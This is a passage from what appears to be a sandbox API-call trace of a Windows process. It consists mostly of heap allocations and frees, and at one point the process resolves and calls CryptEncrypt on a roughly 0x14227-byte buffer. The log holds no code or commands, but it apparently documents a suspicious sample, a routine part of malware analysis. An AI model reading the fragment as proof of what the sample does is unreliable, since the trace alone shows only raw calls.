(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0200.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0200.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.526] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0200.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0200.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14228) returned 0x2e94560 [0200.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0200.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0200.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0200.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0200.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0200.530] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0200.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0200.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14227) returned 0x2ea8790 [0200.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0200.533] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14227) returned 0x2ebc9c0 [0200.536] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0200.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0200.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0200.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0200.537] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.537] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0200.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0200.540] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0200.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0200.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0200.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a88 [0200.541] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0200.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.541] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0200.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e541e8 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0200.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0200.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0200.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0200.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0200.542] CryptEncrypt (in: hKey=0xa87590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94560*, pdwDataLen=0x8cef60*=0x14227, dwBufLen=0x14228 | out: pbData=0x2e94560*, pdwDataLen=0x8cef60*=0x14228) returned 1 [0200.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0200.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0200.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0200.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0200.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0200.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0200.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0200.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0200.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0200.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0200.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0200.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0200.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0200.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0200.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0200.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0200.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0200.572] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0200.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0200.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0200.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0200.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0200.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0200.573] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0200.573] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0200.573] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0200.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0200.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14228) returned 0x2ea8790 [0200.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0200.577] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | 